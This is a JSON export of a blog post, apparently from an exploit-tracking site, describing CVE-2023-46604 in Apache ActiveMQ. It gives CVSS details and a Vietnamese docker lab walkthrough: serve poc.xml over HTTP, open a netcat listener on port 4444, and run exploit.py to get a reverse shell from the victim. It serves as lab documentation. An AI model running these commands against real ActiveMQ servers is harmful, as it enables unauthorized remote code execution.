{"id":2858,"date":"2025-05-04T19:33:09","date_gmt":"2025-05-04T19:33:09","guid":{"rendered":"http:\/\/localhost\/?p=2858"},"modified":"2025-05-04T19:33:09","modified_gmt":"2025-05-04T19:33:09","slug":"exploit-for-deserialization-of-untrusted-data-in-apache-activemq","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=2858","title":{"rendered":"Exploit for Deserialization of Untrusted Data in Apache Activemq"},"content":{"rendered":"
\n

Vulnerability Details<\/h2>\n
\n

Basic Information<\/h3>\n\n\n\n\n\n\n
Title<\/th>\nExploit for Deserialization of Untrusted Data in Apache Activemq<\/td>\n<\/tr>\n
Type<\/th>\ngithubexploit<\/td>\n<\/tr>\n
Published<\/th>\n2025-05-04T14:42:01<\/td>\n<\/tr>\n
Last Seen<\/th>\n2025-05-05T00:04:32<\/td>\n<\/tr>\n
CVSS Score<\/th>\n10.0 (CRITICAL)<\/td>\n<\/tr>\n<\/table><\/div>\n
\n

CVSS v3 Details<\/h3>\n\n\n\n\n\n\n\n\n\n
Attack Vector<\/th>\nNETWORK<\/td>\n<\/tr>\n
Attack Complexity<\/th>\nLOW<\/td>\n<\/tr>\n
Privileges Required<\/th>\nNONE<\/td>\n<\/tr>\n
User Interaction<\/th>\nNONE<\/td>\n<\/tr>\n
Scope<\/th>\nCHANGED<\/td>\n<\/tr>\n
Confidentiality Impact<\/th>\nLOW<\/td>\n<\/tr>\n
Integrity Impact<\/th>\nHIGH<\/td>\n<\/tr>\n
Availability Impact<\/th>\nHIGH<\/td>\n<\/tr>\n<\/table><\/div>\n
\n

CVE Information<\/h3>\n\n\n\n\n
CVE IDs<\/th>\nCVE-2023-46604<\/td>\n<\/tr>\n
CWE<\/th>\n<\/td>\n<\/tr>\n
Bulletin Family<\/th>\nexploit<\/td>\n<\/tr>\n<\/table><\/div>\n
\n

Description<\/h3>\n
\n CVE-2023-46604<\/p>\n

![image](https:\/\/github.com\/user-attachments\/assets\/03899091-1319-4d60-a561-30293999c19f)<\/p>\n

D\u1ef1ng docker-compose ch\u1ee9a 2 image g\u1ed3m m\u00e1y n\u1ea1n nh\u00e2n v\u00e0 m\u00e1y m\u1ee5c ti\u00eau theo m\u00f4i tr\u01b0\u1eddng y\u00eau c\u1ea7u
\nTr\u00ean m\u00e1y n\u1ea1n nh\u00e2n, ti\u1ebfn h\u00e0nh kh\u1edfi \u0111\u1ed9ng ActiveMQ<\/p>\n

Chuy\u1ec3n sang m\u00e1y t\u1ea5n c\u00f4ng:
\n\u2022\tM\u1edf d\u1ecbch v\u1ee5 HTTP \u0111\u1ec3 ti\u1ebfn h\u00e0nh g\u1eedi poc:
\npython3 -m http.server \n

\u2022\tS\u1eed d\u1ee5ng netcat \u0111\u1ec3 l\u1eb3ng nghe k\u1ebft n\u1ed1i \u0111\u1ebfn m\u00e1y t\u1ea5n c\u00f4ng
\nnc -nlvp 4444<\/p>\n

\u2022\tG\u1eedi payload t\u1ea1o k\u1ebft n\u1ed1i reverse shell t\u1edbi m\u00e1y t\u1ea5n c\u00f4ng
\npython3 exploit.py -i 172.18.0.3 -p 61616 –xml http:\/\/172.18.0.2:8000\/poc.xml
\n\tTrong \u0111\u00f3:
\n–\tExploit.py: file code khai th\u00e1c l\u1ed7 h\u1ed5ng
\n–\t-I 172.18.0.3: \u0110\u1ecba ch\u1ec9 IP c\u1ee7a m\u00e1y g\u1eedi payload
\n–\t-p 61616: C\u1ed5ng m\u00e0 ActiveMQ c\u1ee7a m\u00e1y n\u1ea1n nh\u00e2n \u0111ang l\u1eafng nghe
\n–\t–xml http:\/\/172.18.0.2:8000\/poc.xml: \u0110\u1ecba ch\u1ec9 url c\u1ee7a t\u1ec7p poc.xml tr\u00ean m\u00e1y t\u1ea5n c\u00f4ng<\/p>\n

C\u00f3 th\u1ec3 th\u1ea5y, sau khi g\u1ecdi l\u1ec7nh th\u1ef1c thi file \u2018exploit.py\u2019, m\u00e3 khai th\u00e1c s\u1ebd g\u1eedi m\u1ed9t g\u00f3i tin \u2018poc.xml\u2019 tr\u00ean web server t\u1edbi m\u1ee5c ti\u00eau l\u00e0 \u0111\u1ecba ch\u1ec9 c\u1ee7a d\u1ecbch v\u1ee5 ActiveMQ \u0111ang ch\u1ea1y tr\u00ean server m\u1ee5c ti\u00eau. \u0110\u1ed3ng th\u1eddi webserver HTTP tr\u00ean m\u00e1y t\u1ea5n c\u00f4ng c\u0169ng nh\u1eadn \u0111\u01b0\u1ee3c request \u0111\u01b0\u1ee3c g\u1eedi t\u1eeb \u0111\u1ecba ch\u1ec9 ip c\u1ee7a m\u00e1y m\u1ee5c ti\u00eau.<\/p>\n

Sau khi ti\u1ebfn h\u00e0nh g\u1eedi payload, chuy\u1ec3n sang terminal \u0111ang l\u1eafng nghe t\u1ea1i c\u1ed5ng 4444 c\u1ee7a m\u00e1y t\u1ea5n c\u00f4ng. Ta th\u1ea5y reverse shell c\u1ee7a m\u00e1y n\u1ea1n nh\u00e2n \u0111\u00e3 \u0111\u01b0\u1ee3c g\u1eedi v\u1ec1.<\/p><\/div>\n<\/p><\/div>\n

\n

Impact Assessment<\/h3>\n\n\n\n
Base Score<\/th>\n10.0<\/td>\n<\/tr>\n
Severity<\/th>\nCRITICAL<\/td>\n<\/tr>\n<\/table><\/div>\n
\n

View full CVE details<\/a><\/p>\n<\/p><\/div>\n<\/div>\n